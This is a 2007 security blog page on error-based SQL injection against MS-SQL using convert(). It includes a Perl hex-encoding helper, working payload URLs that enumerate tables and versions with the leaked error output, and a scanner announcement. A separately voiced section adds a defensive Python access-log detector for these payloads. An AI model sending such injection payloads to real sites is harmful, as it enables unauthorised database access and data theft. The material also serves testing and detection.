Showing posts with label Project. Show all posts

Tuesday, August 28, 2007

SQLinjection -- convert method (continue)

My friend told me to encode part of the injection parameter from ASCII to hex, so I wrote a small Perl script to do the job for me:

shaolinint@slash$ cat ascii2hex.pl
#! /usr/bin/perl
# usage: ascii2hex.pl STRING
# Rewrites each character of STRING as a T-SQL char(0xNN) call, joined by
# %2B (the URL-encoded '+' string concatenation operator).
my $cmd = shift or die "usage: $0 string\n";
# %02x gives two zero-padded hex digits; %% yields a literal '%' so that
# sprintf does not treat "%2B" as a conversion of its own.
$cmd =~ s/(.)/ sprintf("char(0x%02x)%%2B", ord($1)) /ge;
chomp($cmd);
print "$cmd\n";

shaolinint@slash$ perl ascii2hex.pl table1
char(0x74)%2Bchar(0x61)%2Bchar(0x62)%2Bchar(0x6c)%2Bchar(0x65)%2Bchar(0x31)

I had to remove the trailing '%2B' from the output above to make it work in real injections:

shaolinint@slash$ lynx -dump http://www.target.com/hello.aspx?id=(convert(varchar(255),(SELECT+top+1+table_name+FROM+information_schema.tables+WHERE+table_name+NOT+IN(char(0x74)%2Bchar(0x61)%2Bchar(0x62)%2Bchar(0x6c)%2Bchar(0x65)%2Bchar(0x31))))--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '{]table2 to a column of data type int.

The injection parameter works fine for me. But there is a small problem: I still cannot get the data from all tables and columns at the moment.

Monday, August 27, 2007

SQLinjection -- convert method

Last Saturday I started a Portal Security Assessment for one of my clients here in Saudi, and last night I completed the validation of all my findings. What made the assessment interesting is that I found a potential SQL injection in the portal, which is a good thing for me... But the challenge was to enumerate tables and columns manually, since most of the tools that are supposed to get that information failed to do so... So I tried manually and played around with the injections, but I still couldn't get what I wanted.

During my homework, I found a few interesting ways to print some of the information. If you have any idea how to use the following methods to enumerate tables and columns, please let me know.

convert(int,convert(varchar,INJECTION_PARAMETER_HERE))

(convert(varchar(255),(INJECTION_PARAMETER_HERE)))--

For example:

http://microsoft.com/hello.asp?id=convert(int,convert(varchar,@@version))

http://microsoft.com/hello.asp?id=(convert(varchar(255),(@@version)))--
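Both posts above (the convert() probe here and the char(0x..)%2B-encoded string literal in the follow-up) leave a recognisable trail in the web server's access log, and the technique only pays off when the database error reaches the client. As an added example that is not part of the original posts, the Python script below undoes the percent-encoding and the char() concatenation so the request reads as plain SQL, then flags the indicators of this technique and notes whether the request produced a 5xx response. The log lines it scans are constructed samples, and the signature names are my own labels.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Common Log Format) for this example;
# the addresses and paths are placeholders, not data from the original posts.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Aug/2007:10:01:02 +0300] "GET /hello.aspx?id=42 HTTP/1.1" 200 5120
10.0.0.9 - - [28/Aug/2007:10:01:09 +0300] "GET /hello.aspx?id=convert(int,convert(varchar,@@version)) HTTP/1.1" 500 611
10.0.0.9 - - [28/Aug/2007:10:01:15 +0300] "GET /hello.aspx?id=(convert(varchar(255),(SELECT+top+1+table_name+FROM+information_schema.tables+WHERE+table_name+NOT+IN(char(0x74)%2Bchar(0x61)%2Bchar(0x62)%2Bchar(0x6c)%2Bchar(0x65)%2Bchar(0x31))))-- HTTP/1.1" 500 640
10.0.0.7 - - [28/Aug/2007:10:02:00 +0300] "GET /search.aspx?q=table+tennis HTTP/1.1" 200 2048
"""

# Request line inside a CLF entry: method, URL and the returned status code.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (?P<url>\S+) HTTP/[0-9.]+" (?P<status>\d{3})')

# One T-SQL char(0xNN) call, and a run of them joined with '+'.
CHAR_ONE = re.compile(r"char\(0x([0-9a-fA-F]{1,2})\)")
CHAR_CONCAT = re.compile(r"(?:char\(0x[0-9a-fA-F]{1,2}\)\s*\+?\s*)+")

# Indicators of the error-based convert() technique; the names are my own labels.
SIGNATURES = {
    "convert_cast_probe": re.compile(r"\bconvert\s*\(\s*(?:int|varchar)", re.I),
    "version_probe": re.compile(r"@@version", re.I),
    "schema_enumeration": re.compile(r"information_schema\.(?:tables|columns)", re.I),
    "comment_terminator": re.compile(r"--\s*$"),
}


def decode_char_concat(text):
    """Collapse char(0x74)+char(0x61)+... back into the literal it spells (e.g. 'ta')."""
    def join(match):
        return "".join(chr(int(h, 16)) for h in CHAR_ONE.findall(match.group(0)))
    return CHAR_CONCAT.sub(join, text)


def analyze_request(url, status):
    """Normalise one request URL and return the indicators found in it."""
    decoded = unquote_plus(url)            # %2B -> '+', '+' -> ' '
    normalized = decode_char_concat(decoded)
    indicators = [name for name, rx in SIGNATURES.items() if rx.search(normalized)]
    if CHAR_ONE.search(decoded):
        # The literal was spelled out as char() calls, a common way to avoid quotes.
        indicators.append("char_encoded_literal")
    return {
        "normalized": normalized,
        "indicators": indicators,
        # The technique only works when the DB error reaches the client, so a
        # 5xx on the same request is the strongest corroboration.
        "server_error": status >= 500,
    }


def scan_access_log(text):
    """Return one finding per request that carries at least one indicator."""
    findings = []
    for line in text.splitlines():
        match = REQUEST.search(line)
        if not match:
            continue
        result = analyze_request(match["url"], int(match["status"]))
        if result["indicators"]:
            findings.append({"client": line.split()[0],
                             "status": int(match["status"]), **result})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f["client"], f["status"], ", ".join(f["indicators"]))
        print("   ", f["normalized"])
```

Decoding before matching is the point of the example: a signature written for the raw URL would see `char(0x74)%2Bchar(0x61)` and never the word it spells, while the normalised form reads `NOT IN(table1)` and matches the same rules as an unencoded probe. Pairing the indicator with the response status separates a probe the application swallowed from one that actually leaked an error message.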

Monday, July 9, 2007

Seaweed v1.0

Seaweed, coded in Cocoa Objective-C, is a SQL injection scanner able to crawl, detect SQL injection vectors, identify the back-end database and grab function call/UDF results (and even execute system commands on MS-SQL). The concepts it uses differ from those used in other SQL injection scanners. I'm planning to import a few scripts from Perl and Python instead of using my own kung-fu :)